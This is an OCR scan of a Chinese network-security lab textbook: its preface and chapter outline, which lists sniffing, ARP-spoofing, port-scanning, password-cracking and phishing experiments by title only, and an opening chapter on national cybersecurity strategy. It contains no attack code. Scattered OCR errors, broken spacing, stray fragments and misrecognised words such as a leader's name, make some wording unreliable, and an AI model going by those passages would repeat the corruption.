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1. 写作 背景 

目前 ,关于 我 国 高 等 教育 的 信息 安全 学 科 和 专业 方向 设置 问题 受到 非常 大 的 关注 。 对 
于 信息 安全 专业 的 本 科 生 教育 而 言 , 其 基本 的 培养 方案 .课程 设置 和 教学 大 纲 都 需要 根据 新 
的 形势 发 生变 革 ,保密 与 信息 安全 专业 方向 也 在 积极 地 进行 准备 。 

在 新 形势 下 ,对 于 信息 安全 专业 人 才 的 培养 标准 是 : 具有 宽厚 的 理工 基础 ,掌握 信息 科 
学 和 管理 科学 专业 基础 知识 ,系统 地 掌握 信息 安全 与 保密 专业 知识 ,具有 良好 的 学 习 能 力 、 
分 析 与 解决 问题 能 力 、 实 践 与 创新 能 力 。 特 别 是 在 能 力 方面 ,要 求 专业 学 生 能 够 做 到 : 具有 
设计 和 开发 信息 安全 与 防范 系统 的 基本 能 力 , 具 有 获取 信息 和 运用 知识 解决 实际 问题 的 能 
力 , 具 有 良好 的 专业 实践 能 力 和 基本 的 科研 能 力 。 

实践 学 时 的 设置 不 仅 起 到 加 深 学 生理 论 课 所 学 知识 的 作用 ,还 有 助 于 培养 学 生 建 立 理 
论 与 实践 相 结合 解决 实际 问题 的 能 力 。 对 于 实现 当前 的 高 等 教育 改革 目标 ,提高 毕业 生 综 
合 素质 具有 重要 的 意义 。 但 是 , 受 实验 设备 所 限 , 各 课程 的 实验 环节 较 分 散 ,分 布 在 不 同 的 
实验 平台 或 实验 课程 中 ,缺乏 连贯 性 和 整体 性 。 网 络 安全 实践 环节 的 设立 ,是 对 计算 机 网 
络 、 现 代 密码 学 .信息 系统 安全 、 网 络 安全 ,软件 安全 、 信 息 安 全 管理 等 专业 核心 课程 的 有 效 
支撑 。 

本 书 的 编写 思路 是 : 根据 网 络 安全 的 体系 架构 ,确定 需要 重点 讲授 和 考核 的 内 容 ,并 针 
对 具体 内 容 选择 最 具 代 表 性 的 实用 型 软件 工具 或 主流 技术 ,同时 结合 主体 技术 开展 具有 基 
础 实验 和 扩展 实验 相 结合 的 实验 内 容 , 既 能 够 满足 日 常 的 实验 教学 活动 ,又 能 够 促进 学 生 创 
新 实践 能 力 的 培养 和 提高 。 

2. 本 书 特 点 

本 书 兼顾 高 等 学 校 理论 教学 需要 与 培养 学 生 实践 能 力 的 需求 ,借鉴 国外 名 校 的 信息 安 
全 专业 课程 设置 及 相关 课程 内 容 安排 ,组 织 本 教程 的 相关 理论 知识 及 实验 用 例 设计 ,力争 理 
iE VEU .用例 科 学 .指导 到 位 。 配 合 高 等 学 校 的 计算 机 网 络 、 现 代 密 码 学 .信息 系统 安全 、 网 
络 安全 、 软 件 安 全 、 信 息 安 全 管理 等 课程 的 实践 教学 环节 ,突出 实用 性 ,所 有 实验 可 操作 性 
强 ,与 实践 结合 紧密 。 本 书 不 仅 介绍 网 络 安全 的 核心 理论 和 主要 技术 ,更 着 眼 于 介绍 在 网 络 
安全 管理 和 实践 过 程 中 如 何 运用 系统 软件 支撑 和 维护 网 络 健康 运行 。 

本 书 可 作为 信息 安全 专业 及 相关 专业 计算 机 网 络 、 现 代 密 码 学 、 信 息 系统 安全 、 网 络 安 
全 、 信 息 安 全 管理 等 课程 的 实践 教材 , 书 中 的 全 部 实验 示例 都 经 过 精心 的 设计 和 完全 的 调 
试 , 可 以 放心 使 用 。 

3. 内 容 安排 

本 书 的 内 容 安排 如 下 。 

名 第 1 章 介绍 了 网 络 安全 的 基本 概念 和 发 展 情况 。 从 国家 战略 层面 ,介绍 了 网 络 空间 

安全 治理 体系 .黑客 和 人 侵 、 国 内 外 网 络 安全 攻防 手段 。 从 技术 层面 ,介绍 了 网 络 安全 
的 研究 内 容 、 体 系 结构 .评价 标准 等 。 最 后 介绍 了 国际 法 适用 于 虚拟 空间 的 有 益 探 
de. 


索 一 一 《塔林 手册 》。 

名 第 2 章 介 绍 了 网 络 安全 的 研究 内 容 , 包 括 密码 技术 、 防 火 墙 技 术 、 入 侵 检测 技术 、 网 
络 安全 态势 感知 技术 、 网 络 认证 技术 。 

名 第 3 章 介 绍 了 网 络 分 析 实 验 的 原理 和 技术 ,重点 介绍 了 基于 Sniffer Pro 嗅 探 软件 的 
数据 包 捕 获 、 网 络 监视 等 功能 ,对 多 种 网 络 协议 进行 嗅 探 分 析 的 扩展 实验 环节 。 

如 第 4 章 介 绍 了 内 容 安 全 的 概念 和 应 用 层 的 安全 协议 ,着 重 介绍 了 有 关内 容 分 析 的 安 
全 实验 ,包括 数据 抓 包 行为 分 析 实 验 和 ARP 欺骗 实验 。 

如 第 5 章 介 绍 了 防火 墙 技 术 , 并 结合 天 网 防火 墙 和 瑞星 防火 墙 ,讲述 了 防火 墙 使 用 及 
配置 方法 。 

名 第 6 章 介 绍 了 入 侵 检测 技术 ,重点 讲述 了 Snort 入 侵 检测 工具 的 使 用 方法 ,新 增 了 基 
于 虚拟 蜜 网 的 网 络 攻防 基本 原理 和 实验 ,以 及 工业 信息 安全 的 基本 原理 和 工控 入 侵 
系统 检测 方法 实验 。 

名 第 7 章 讨 论 了 常见 的 Web 漏洞 ,以 及 针对 Web 漏洞 扫描 攻击 的 实验 。 

a FS 89.1011 章 分 别 介绍 了 主机 探测 及 端口 扫描 实验 \ 口 令 破解 及 安全 加 密 电邮 实 
验 、 邮 件 钓 鱼 社会 工程 学 实验 、 网 络 服务 扫描 实验 。 
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第 1 登 ” 网 络 安全 概述 


1.1 引 论 


1.1.1 网 络 空 间 安 全 治理 体系 


1. 网 络 安全 国家 战略 的 基本 理论 问题 

习近平 总 书记 指出 ,没有 网 络 安全 就 没有 国家 安全 ,没有 信息 化 就 没有 现代 化 。 

2017 年 12 月 8 日 ,习近平 总 书记 在 主持 中 共 中 央 政 治 局 第 二 次 集体 学 习 时 强调 ,我 们 
应 该 审时度势 .精心 谋划 、 超 前 布局 .力争 主 动 ,加 快 构建 高 速 , 移 动 、 安 全 、 泛 在 的 新 一 代 信 
息 基础 设施 ,统筹 规划 政务 数据 资源 和 社会 数据 资源 ,完善 基础 信息 资源 和 重要 领域 信息 资 
源 建设 ,形成 万 物 互 联 、 人 机 交互 .天 地 一 体 的 网 络 空 间 。 

随 着 新 时 代 科技 的 不 断 进步 ,互联 网 已 经 逐渐 渗透 到 现代 生活 、 工 作 的 方方面面 。 由 于 
社会 对 网 络 的 依赖 度 不 断 提 高 ,网 络 空间 安全 也 越 来 越 受到 重视 和 关注 。 在 计算 机 网 络 应 
用 飞速 发 展 的 同时 ,计算 机 网 络 空间 暴露 出 当下 存在 的 诸多 威胁 网 络 安全 的 因素 。 网 络 安 
全 具有 保密 性 ` 完 整 性 .可 用 性 .可 控 性 、 可 审查 性 等 特点 ,网 络 信息 安全 一 旦 受到 威胁 ,网 络 
犯罪 对 数据 安全 的 破坏 将 会 对 社会 造成 难以 估量 的 影响 ,甚至 可 能 影响 社会 经 济 的 稳定 运 
行 。 因 此 ,对 网 络 安全 现状 和 对 策 的 分 析 研究 就 尤为 重要 ,通过 使 用 新 兴 的 网 络 安全 分 析 技 
术 , 构 建 合 理 的 网 络 安全 管理 模式 ,完善 相关 的 法 律 制度 ,明确 责 权 ,对 维护 我 国 网 络 空间 安 
全 有 着 重大 意义 。 

随 着 计算 机 技术 的 改进 和 互联 网 的 广泛 应 用 ,网 络 空间 安全 已 逐渐 成 为 任何 一 个 国家 
不 敢 忽 视 的 重要 国防 安全 阵地 。 习 近乎 总 书记 指出 “没有 网 络 安全 就 没有 国家 安全 ”, 可 以 
说 一 针 见 血 ,高 屋 建 领 。 今 天 ,网 络 空间 安全 国家 战略 已 经 被 世界 各 大 国 高 度 重视 。 著 名 的 
《孙子 兵法 》 中 提 到 的 “不 战 而 届 人 之 兵 ”, 在 信息 安全 领域 里 愈 来 愈 接 近 现 实 。 未 来 ,依靠 网 
络 空间 安全 技术 的 智慧 ,一 个 人 打败 一 个 国家 已 经 不 再 是 神话 。 当 前 各 国之 间 的 网 络 攻击 
日 渐 频繁 ,在 看 不 见 硝烟 的 攻击 中 ,网 络 空间 安全 已 经 成 为 一 把 达 摩 克利 斯 之 剑 悬 在 各 国 网 
络 空间 安全 的 战场 之 上 。 国 家 的 兴亡 关系 到 我 们 每 个 人 的 利益 ,是 我 们 绕 不 开 的 生存 课题 ， 
任何 人 都 无 法 置身 度 外 。 党 的 十 八大 报告 明确 指出 ,要 高 度 关注 网 络 安 全 ,健全 信息 安全 保 
障 体系 。 党 的 十 八 届 三 中 全 会 再 次 强调 :“ 加 快 完善 互联 网 管理 领导 体制 ,确保 国家 网 络 和 
信息 安全 ”。2014 4E 2 月 ,中 央 网 络 安 全 和 信息 化 领导 小 组 正式 成 立 , 习 近乎 总 书记 担任 组 
长 ,我 国 网 络 安全 保障 工作 进入 一 个 全 新 的 历史 阶段 ,制定 中 国 的 网 络 安全 国家 战略 已 经 被 
决策 层 高 度 关注 并 提 上 日 程 。2015 年 7 月 《网 络 安全 法 (草案 )》 公 开征 求 意见 ,以 立法 形 
式 明 确 “ 国 家 制定 网 络 安全 战略 ”, 被 认为 是 我 国 加 强 网 络 安 全 领域 顶层 设计 的 一 项 重大 举 
措 ,网 络 安全 国家 战略 呼之欲出 。 对 网 络 安 全 国家 战略 的 研究 ,需要 在 准确 认识 网 络 安全 和 
国家 安全 战略 及 网 络 安全 国家 战略 等 概念 的 发 展 由 来 与 内 涵 的 基础 上 展开 。 对 网 络 安全 国 
家 战略 特点 及 其 战略 模式 、 战 略 要 素 的 探讨 ,也 将 为 从 实践 层面 进行 分 析 英 定理 论 基础 。 
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2. 网 络 空间 安全 基本 内 洒 

网 络 空间 安 全 是 反恐 ,社会 服务 和 治理 之 基 , 事 关 国 家 安全 和 国计民生 。 天 地 一 体 化 信 
息 网 络 作为 关键 基础 设施 ,其 安全 的 重要 性 不 言 而 喻 。 随 着 国家 安全 、 航 空 航天 、 灾 害 预 警 
等 需求 的 不 断 增 强 ,以 及 空间 探索 等 任务 的 逐渐 深入 ,各 种 战略 信息 任务 在 陆 \ 海 、 空 .天 等 
不 同 维度 空间 不 断 开 展 , 使 原先 相互 独立 的 网 络 根据 需要 进行 信息 共享 ,实现 跨 地 域 . 跨 空 
域 通信 和 网络 各 节点 协同 工作 ,这 促使 卫星 网 络 进一步 发 展 ,并 要 求 卫星 网 络 与 空间 飞行 
器 .地 面 网 络 等 有 机 融合 ,形成 天 地 一 体 化 信息 网 络 ,从 而 更 好 地 服务 于 国家 发 展 和 人 民 对 
美好 生活 的 需要 。 

“网 络 安全 ”是 一 个 被 广泛 使 用 又 很 难 被 准确 定义 的 概念 ,但 对 其 内 涵 的 分 析 有 助 于 厘 
清 网 络 安 全 国家 战略 研究 的 范围 和 边界 。 从 历史 发 展 的 角度 看 ,信息 安全 (information 
security) 概 念 的 出 现 早 于 网 络 安全 (cyber security) ,网 络 安全 通常 作为 信息 安全 的 一 个 附 
属 概念 使 用 。 直 至 21 世纪 初 , 随 着 互联 网 的 全 球 普及 和 网 络 信息 技术 的 飞速 发 展 , 越 来 越 
多 的 国家 会 在 出 台 的 相关 国家 战略 文件 中 使 用 “网 络 安全 ”一 词 , 从 而 使 网 络 安 全 从 信息 安 
全 中 独立 出 来 ,日 益 发 展 成 为 一 个 具有 鲜明 时 代 特 征 和 丰富 内 涵 的 概念 。 联 合 国 国际 电信 
联盟 (ITU) 给 出 的 网 络 安全 的 定义 是 : 工具 、 政 策 、 安 全 概念 、 安 全 保障 、 指 导 方 针 、 风 险 管 
理 方法 .行动 .训练 .最 好 的 实践 保障 措施 及 技术 的 集合 ,这 一 集合 能 够 被 用 于 保障 网 络 环 
境 , 以 及 其 组 织 和 用 户 的 财产 。 网 络 安全 旨 在 实现 并 维护 组 织 和 用 户 资产 在 网 络 空间 的 安 
全 属性 ,反击 网 络 环境 中 相关 的 安全 风险 。 安 全 属性 包括 可 用 人 性、 可 信和 度 ( 包 括 真实 性 和 不 
可 抵赖 性 ) .保密 性 。 我 国 许多 学 者 对 何 为 网 络 安全 进行 了 深入 研究 和 探讨 ,有 的 学 者 认为 ， 
网 络 安全 是 指 计 算 机 系统 的 软 硬 件数 据 受 到 保护 ,使 之 免 受 因 偶然 或 恶意 因素 而 遭 到 破 
坏 更改、 泄露 ,保持 系统 连续 、 正 常 地 运行 。 从 技术 层面 讲 , 其 实质 是 确保 系统 和 信息 的 完 
整 性 ,保密 性 、 可 用 性 、 不 可 否认 性 和 可 控 性 ;从 国家 安全 的 层面 讲 , 就 是 指 通 过 保护 对 国家 
和 社会 具有 重要 作用 的 网 络 系统 和 信息 的 安全 ,使 之 免 遭 其 他 国家 和 个 人 的 恶意 攻击 与 破 
坏 , 从 而 保证 国家 安全 战略 的 有 效 实施 。 有 的 学 者 认为 ,网 络 安全 是 指 网 络 系统 的 硬件 、 软 
件 及 其 系统 中 的 数据 受到 保护 ,不 因 偶然 或 恶意 原因 而 遭 到 破坏 、 更 改 、 泄 露 ,使 系统 连续 可 
靠 ,正常 地 运行 ,网 络 服务 不 中 断 。 网 络 安全 从 其 本 质 上 讲 就 是 网 络 上 的 信息 安全 。 从 广义 
来 说 ,凡是 涉及 网 络 上 信息 的 保密 性 完整 性 可用性、 真实 性 和 可 控 性 的 相关 技术 和 理论 都 
是 网 络 安全 的 研究 领域 。 有 的 学 者 使 用 计算 机 网 络 安全 的 概念 ,认为 计算 机 网 络 安全 是 指 
利用 网 络 管理 控制 和 技术 措施 ,保证 在 一 个 网 络 环境 里 ,网 络 系统 的 软件 .硬件 及 其 系统 中 
运行 的 所 有 数据 受到 安全 保护 ,不 因 偶然 或 恶意 原因 而 遭 到 破坏 、 更 改 和 泄露 。 计 算 机 网 络 
安全 包括 两 个 方面 的 安全 , 即 逻辑 安全 和 物理 安全 。 逻 辑 安 全 是 指 信息 的 完整 性 、 保 密 性 和 
可 用 性 。 物 理 安全 是 指 系 统 设备 及 相关 设施 受到 物理 保护 , 免 于 破坏 .丢失 等 。 还 有 的 学 者 
从 更 加 宏观 的 角度 对 网 络 安全 进行 定义 ,认为 国家 网 络 安全 指 的 是 国家 行为 体 认为 特定 的 
信息 基础 设施 .特定 的 信息 流动 ,以 及 国家 对 于 上 述 设施 和 信息 的 控制 能 力 不 面 临 威胁 。 纵 
观 这 些 关于 国家 网 络 安全 的 概念 可 以 看 出 , 现 有 对 网 络 安全 的 界定 或 从 信息 安全 的 概念 出 
发 ,强调 网 络 中 信息 的 完整 性 、 可 用 性 ,保密 性 、 可 靠 性 、 不 可 抵赖 性 和 可 控 性 等 特征 ;或 突出 
网 络 安全 的 技术 属性 ,侧重 从 技术 角度 对 网 络 安 全 予以 概括 ;或 注意 到 了 网 络 安全 中 物理 安 
全 的 内 容 , 以 及 国家 作为 主体 的 特质 ,尝试 从 更 加 综合 .宏观 的 角度 进行 抽象 ,体现 了 国家 网 
络 安全 研究 的 最 新 发 展 。 网 络 安全 源 于 信息 技术 的 迅猛 发 展 与 广泛 应 用 ,但 又 超出 了 信息 
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技术 问题 自身 的 范畴 , 它 不 仅 表现 为 对 信息 技术 及 其 发 展 的 强烈 依赖 ,而 且 从 网 络 安全 概念 
提出 之 日 起 ,就 自然 地 表现 为 对 物理 环境 和 人 行为 本 身 的 强烈 依赖 。 从 传统 的 国家 安全 研 
究 和 网 络 安全 自身 性 质 出 发 ,国家 网 络 安全 是 指 国家 网 络 信息 基础 设施 及 其 存储 流动 的 信 
息 免 于 现实 存在 的 破坏 或 威胁 ,并 且 没有 被 破坏 或 威胁 的 疏 惧 。 从 微观 角度 看 ,国家 网 络 安 
全 是 一 种 结合 了 技术 层面 安全 和 物理 环境 安全 、 人 的 安全 等 的 综合 安全 ;从 国家 安全 的 宏观 
角度 看 ,国家 网 络 安全 兼 具 “传统 安全 ”与 “ 非 传统 安全 ”的 特征 ,体现 为 国家 对 网 络 信息 技 
术 、 信 息 内 容 、 信 息 活动 和 方式 及 信息 基础 设施 的 控制 力 。 这 里 需要 特别 指出 的 是 ,信息 安 
全 与 网 络 安全 是 一 对 既 密 切 联系 ,又 相互 区 别 的 概念 。 信 息 安 全 的 出 现 早 于 网 络 安全 , 据 一 
些 学 者 考究 ,信息 安全 一 词 最 早 是 20 世纪 60 年 代 美 军 通信 保密 和 作战 文献 中 使 用 的 概念 ， 
而 网 络 安全 则 是 20 世纪 90 年 代 初 随 着 互联 网 的 普及 应 用 才 产 生 的 。 我 国 一 些 学 者 认为 ， 
信息 安全 包括 网 络 安全 ,网 络 安全 是 信息 安全 的 核心 。 这 种 观点 仅 是 从 狭义 角度 理解 信息 
安全 和 网 络 安全 的 概念 。 虽 然 网 络 安全 是 在 网 络 信息 化 高 速 发 展 的 背景 下 从 信息 安全 概念 
发 展 而 来 的 ,二 者 之 间 在 内 涵 上 存在 交集 ,但 信息 安全 与 网 络 安全 并 不 是 涵盖 关系 。 信 息 安 
全 关注 的 关键 点 在 于 “信息 ”, 不 仅 包括 存在 于 信息 系统 或 网 络 空间 的 信息 ,也 包括 更 广泛 意 
义 上 的 物理 空间 信息 ,如 通过 传统 纸 质 载 体 存储 流转 的 信息 以 及 国家 秘密 、 商 业 秘密 和 个 
人 隐私 保护 领域 与 网 络 空间 并 不 相关 的 部 分 等 ;而 网 络 安全 不 仅 关注 网 络 空间 中 ”信息 ”的 
安全 ,网 络 信息 基础 设施 的 物理 安全 以 及 国家 的 控制 力 同 样 是 网 络 安全 的 重要 内 容 ,这些 无 
论 在 狭义 上 ,还 是 广义 上 都 显然 已 经 超出 了 信息 安全 概念 的 内 涵 。 
3. 国家 安全 战略 和 网 络 安全 国家 战略 
《辞海 ) 对 “国家 安全 战略 ”的 定义 是 : 筹划 与 指导 国家 安全 斗争 全 局 的 方略 ,并 指出 制 
定 国 家 安全 战略 的 目的 是 保障 国家 的 领土 主权 完整 并 不 受 外 敌 入 侵 , 维 护 国家 政治 稳定 ， 
保证 社会 文化 与 意识 形态 领域 不 受 敌 对 思想 侵蚀 ,确保 国家 经 济 、 科 技 发 展 利益 不 受 侵害 ， 
增强 抵御 各 种 安全 威胁 的 能 力 等 。 加 强 综合 国力 建设 ,做 好 战争 准备 和 非 传统 安全 领域 的 
斗争 准备 ,是 实现 国家 安全 战略 目的 的 主要 措施 。 我 国 一 些 国际 政治 学 者 对 国家 安全 战略 
研究 给 予 极 大 关注 。 有 的 学 者 认为 ,国家 安全 战略 就 是 国家 在 一 定 的 地 缘 政 治 、 地 缘 经 济 和 
社会 文化 背景 下 ,根据 本 国 对 国家 利益 的 界定 ,对 现存 和 潜在 威胁 的 判断 ,以 及 对 可 动用 的 
资源 的 判断 ,决定 用 什么 方式 或 怎样 分 配 和 使 用 资源 对 付 威胁 ,有 效 保障 本 国安 全 的 整体 规 
划 ; 有 的 学 者 认为 ,国家 安全 战略 是 一 个 国家 在 特定 历史 条 件 下 ,综合 运用 政治 、 经 济 、 军 事 、 
文化 等 各 种 资源 ,应 对 核心 利益 挑战 与 威胁 ,维护 国家 安全 利益 与 价值 观 的 总 体 构想 。 最 早 
提出 国家 安全 战略 概念 的 国家 是 美国 。1987 年 ,美国 里 根 政府 发 布 美国 历史 上 第 一 份 ( 国 
家 安全 战略 报告 》, 并 在 之 后 逐步 形成 了 一 个 多 层次 、 多 类 别 、 相 互 协调 配合 的 国家 战略 体 
系 。2000 年 ,美国 (国家 安全 战略 报告 的 颁布 是 美国 国家 网 络 安全 政策 的 重大 事件 ,在 该 
报告 中 ,“ 信 息 安 全 ”被 列 人 其 中 ,成 为 国家 安全 战略 的 正式 组 成 部 分 。 这 标志 着 信息 安全 
(后 来 逐步 使 用 网 络 安全 的 概念 ) 正 式 进入 国家 安全 战略 框架 ,并 开始 具有 其 自身 的 独立 地 
位 。2003 年 ,小 布什 政府 发 布 了 《网 络 空 间 国 家 安全 战略 》, 它 是 美国 历史 上 第 一 部 全 面 的 、 
纲领 性 的 网 络 安全 国家 战略 文件 。 近 年 来 ,世界 主要 国家 相继 制定 出 台 网 络 安全 国家 战略 ， 
旨 在 加 强国 家 层面 对 网 络 安全 的 统筹 谋划 和 综合 协调 ,世界 范围 内 进入 了 一 个 网 络 安全 战 
完善 和 调整 的 密集 期 。 我 们 看 到 ,网 络 安全 ”问题 之 所 以 能 被 纳入 “国家 安全 ”的 研究 领 
域 ,从 而 导致 "国家 网 络 安全 ?这 一 新 的 交叉 研究 领域 的 产生 ,重要 原因 之 一 是 自 20 世纪 70 
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年 代 以 来 ,信息 技术 已 深刻 地 渗透 进 国家 生活 的 方方面面 ,现代 国家 对 信息 技术 的 依赖 已 达 
到 如 此 之 深 的 地 步 ,以 至 于 如 果 某 些 至 关 重要 的 信息 基础 设施 受到 破坏 ,国家 就 会 面临 巴 
瑞 ， 布 赞 (Barry Buzan) 等 描述 的 “生存 性 威胁 ”。 网 络 安全 国家 战略 既是 一 国 国家 安全 战 
略 的 重要 组 成 部 分 ,本 质 上 为 国家 安全 目标 和 国家 总 体 战略 目标 服务 ,同时 又 是 施行 国家 战 
略 的 重要 手段 ,特别 是 在 当今 网 络 信息 化 高 速 发 展 ,与 传统 的 政治 .经济 .军事 ,文化 .外 交 、 
科技 等 领域 高 度 融 合 、 密 不 可 分 的 背景 下 ,任何 国家 安全 和 国家 发 展 战 略 目标 的 实现 ,无 不 
强烈 需要 或 高 度 依赖 网 络 安全 。 由 此 ,网 络 安全 国家 战略 日 益 成 为 国家 总 体 战略 目标 实现 
的 基础 性 战略 。 

4. 网 络 安全 国家 战略 的 模式 和 要 素 
于 各 国 的 国力 差别 及 历史 、 文 化 背景 等 方面 的 不 同 ,更 由 于 国家 利益 的 不 一 致 ,不 同 
国家 的 网 络 安全 战略 采取 了 不 同 的 模式 。 同 时 ,各 国 不 同 模式 的 网 络 安全 战略 在 构成 要 素 
方面 又 体现 出 某 种 程度 的 共性 特征 。 
) 网 络 安 全 国家 战略 的 主要 模式 

网 络 安全 国家 战略 模式 根据 不 同 标准 可 以 有 不 同 分 类 。 从 一 国 战略 与 其 他 国家 战略 的 
关系 看 ,可 分 为 “主导 型 "战略 模式 “跟随 型 "战略 模式 和 “自主 型 战略 模式 。“ 主 导 型 战略 
模式 是 一 国 网 络 安全 战略 从 理念 目标、 原则 、 措 施 等 方面 引领 世界 网 络 安全 的 发 展 ,对 其 他 
国家 的 战略 产生 重大 影响 ,对 相关 国际 规则 的 制定 拥有 很 大 话语 权 , 这 种 模式 以 国家 具有 政 
治 、 经 济 、. 军 事 及 网 络 信息 技术 发 展 等 方面 强大 的 国家 实力 为 基础 。 美 国 是 “主导 型 ?网络 安 
全 战略 模式 的 典型 代表 。“ 跟 随 型 ?战略 模式 是 一 国 网 络 安全 战略 ,在 理念 与 价值 追求 等 方 
面 与 “主导 型 "国家 保持 一 致 ,在 实现 战略 目标 的 方式 手段 和 部 署 具体 措施 方面 充分 借鉴 并 
参照 “主导 型 "国家 ,这 种 模式 往往 基于 “跟随 型 "国家 与 “主导 型 "国家 在 价值 取向 和 国家 利 
益 选 择 等 方面 某 种 程度 的 一 致 性 。 英 国 、 法 国 \ 日 本 、 加 拿 大 、 澳 大 利 亚 等 国 采 取 的 是 这 种 模 
式 。“ 自 主 型 "战略 模式 强调 网 络 安全 领域 的 独立 自主 ,在 网 络 安全 战略 的 价值 取向 、 理 念 原 
则 和 战略 目标 等 方面 保持 自身 独特 立场 ,虽然 也 积极 借鉴 其 他 国家 的 经 验 并 重视 国际 合作 ， 
但 在 维护 本 国 网 络 安全 的 行动 举措 方面 具有 自己 的 鲜明 特色 。 俄 罗斯 .印度 等 国 的 网 络 安 
全 战略 倾向 于 这 种 模式 。 根 据 不 同 国家 网 络 安全 战略 遵循 的 安全 理念 和 采取 的 措施 导向 ， 
网 络 安 全 战略 又 可 分 为 “防御 型 "战略 模式 和 “进攻 型 "战略 模式 。“ 防 御 型 "战略 模式 是 传统 
模式 ,也 是 当今 世界 主要 国家 普遍 采取 的 网 络 安全 国家 战略 模式 。 这 种 模式 维护 国家 网 络 
安全 的 重点 在 于 ”防御 ”, 通 过 降低 自身 抵御 网 络 威胁 的 脆弱 性 ,构筑 国家 网 络 安全 防御 体系 
实现 网 络 安全 战略 目标 ,维护 国家 利益 。“ 进 攻 型 战略 模式 是 近年 网 络 安全 领域 新 的 发 展 
模式 , 它 在 “防御 ”的 基础 上 引入 “进攻 ”, 将 进攻 视 为 最 好 的 防御 ,其 维护 国家 网 络 安全 的 重 
点 以 “防御 ”和 “进攻 "并重, 更 加 重视 主动 进攻 ,网 络 安全 战略 部 署 的 各 项 措施 显著 突出 进攻 
能 力 的 提升 。 从 世界 范围 看 ,美国 自 网 络 空间 国际 战略 和 网 络 空间 行动 战略 出 台 之 后 ,已 实 
现 从 “防御 型 "战略 模式 向 “进攻 型 "战略 模式 的 转变 ,其 先发制人 的 打击 理念 和 各 种 网 络 武 
器 的 研发 使 用 ,以 及 “棱镜 事件 "曝光 的 全 球 范围 大 规模 网 络 监 听 行 动 等 ,都 是 其 “进攻 型 "网 
络 安 全 国家 战略 的 直接 体现 。 近 年 来 ,日 本 等 西方 国家 的 网 络 安全 战略 跟随 美国 ,从 “防御 
型 ”向 “进攻 型 "转向 的 趋势 十 分 明显 。 

2) 网 络 安全 国家 战略 的 要 素 

对 一 国 网 络 安全 国家 战略 要 素 的 考察 ,可 以 从 基础 要 素 和 结构 要 素 两 个 方面 进行 。 
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一 是 基础 要 素 。 网 络 安全 国家 战略 包含 3 项 基础 要 素 ,或 者 说 3 个 基本 前 提 , 即 安全 威 
胁 的 认 知 、 安 全 边界 的 确定 和 资源 实力 的 评估 。 

安全 威胁 的 认 知 。 将 一 国 的 网 络 安全 基本 理念 落实 到 具体 的 国家 战略 并 付 诸 实施 时 ， 
首先 应 对 本 国 面临 的 网 络 安全 威胁 有 一 个 全 面 、 客 观 、 准 确 的 认 知 。 网 络 安全 问题 综合 性 、 
复杂 性 的 一 个 重要 体现 , 正 是 一 国 面临 的 网 络 安全 威胁 来 自 不 同方 面 和 领域 ,这 就 需要 对 网 
络 安全 的 国内 威胁 (或 风险 ) 和 国外 威胁 、 来 自 国 家 行为 体 和 非 国家 行为 体 的 威胁 ,以 及 针对 
政治 .军事 、 经 济 文化 .社会 等 不 同 领域 的 威胁 有 一 个 清醒 的 判断 ,需要 对 国家 网 络 安全 面 
临 的 现实 威胁 和 潜在 威胁 有 一 个 清醒 的 判断 ,同时 ,也 需要 对 国家 网 络 安全 和 信息 化 发 展 所 
处 的 阶段 以 及 国际 网 络 安全 的 整体 态势 和 安全 环境 有 一 个 清醒 的 判断 。 

安全 边界 的 确定 。 任 何 一 项 安全 战略 都 有 自身 的 安全 边界 。 国 家 战略 反映 的 是 一 国 的 
核心 利益 诉求 ,因而 ,网 络 安全 国家 战略 的 安全 边界 从 根本 上 决定 于 国家 利益 。 这 种 国家 利 
益 既 包括 存在 于 网 络 这 一 虚拟 空间 的 国家 利益 ,也 包括 物质 世界 的 国家 利益 ; 既 包 括 国家 的 
安全 利益 ,也 包括 国家 的 发 展 利益 ; 既 包括 国家 的 现实 利益 ,也 包括 国家 的 潜在 利益 。 同 时 ， 
由 于 国家 利益 跨越 时 空 的 多 层次 性 ,国家 网 络 安全 边界 也 体现 出 针对 不 同时 空 范围 具有 不 
同 层次 的 特征 。 虽 然 安 全 概念 某 种 程度 的 泛 化 和 滥用 使 得 国家 安全 战略 维护 的 国家 利益 有 
时 变 得 模糊 ,但 从 一 国 网 络 安全 战略 决策 的 角度 出 发 ,厘清 一 国 国家 利益 诉求 ,科学 界定 国 
家 网 络 安全 边界 ,是 制定 网 络 安全 国家 战略 的 重要 基础 要 素 。 

资源 实力 的 评估 。 一 国 的 网 络 安全 国家 战略 只 能 建立 在 本 国 网 络 安全 保障 的 资源 实力 
的 基础 上 ,其 战略 目标 ,战略 措施 等 也 必须 充分 考量 和 围绕 这 种 资源 实力 的 实际 ,脱离 实际 
的 网 络 安全 战略 将 只 是 一 种 美好 的 懂 慢 ,而 难以 得 到 落实 。 作 为 网 络 安全 国家 战略 重要 基 
础 要 素 的 资源 实力 , 既 应 包括 一 国 的 科技 发 展 水 平 ,特别 是 网 络 信息 核心 技术 发 展 水 平等 硬 
实力 ,也 应 包括 管理 体系 、 人 才 队 伍 、 法 规制 度 、 理 论 研究 等 软 实力 ; 既 应 包括 国家 在 网 络 空 
间 拥 有 的 资源 和 实力 ,也 应 包括 国家 在 政治 军事、 经 济 、 外 交 、 文 化 等 传统 领域 的 资源 和 实 
力 ; 既 应 包括 调动 和 运用 国内 相关 资源 的 能 力 , 也 应 包括 在 国际 社会 发 挥 作用 和 影响 力 的 资 
源 实力 。 

二 是 结构 要 素 。 纵 观 各 国 的 战略 实践 ,网 络 安全 国家 战略 结构 要 素 主要 包括 战略 目标 、 
战略 原则 、 战 略 措施 和 战略 保障 等 。 其 中 ,战略 目标 是 一 国 网 络 安全 国家 战略 的 出 发 点 和 归 
宿 ,指明 了 在 一 定时 期 内 国家 网 络 安全 要 达到 的 状态 或 实现 的 结果 ,是 网 络 安全 战略 的 核 
心 ;战略 原则 是 一 国 网 络 安全 国家 战略 的 理念 表达 和 思想 指引 ,集中 体现 国家 网 络 安全 利益 
诉求 ,明确 了 实现 网 络 安全 国家 战略 目标 的 基本 要 求 和 方法 路 径 , 从 而 决定 网 络 安全 战略 的 
实施 方式 、 实 现 效果 和 资源 投入 程度 等 ;战略 措施 是 国家 调动 相关 资源 力量 保障 国家 网 络 安 
全 的 一 系列 具体 行动 ,是 网 络 安全 战略 的 主体 ;战略 保障 是 国家 为 推进 网 络 安全 国家 战略 部 
署 的 各 项 措施 落实 ,实现 国家 战略 目标 从 组 织 体 系 、 法 规制 度 及 资金 安排 等 方面 提供 的 支 
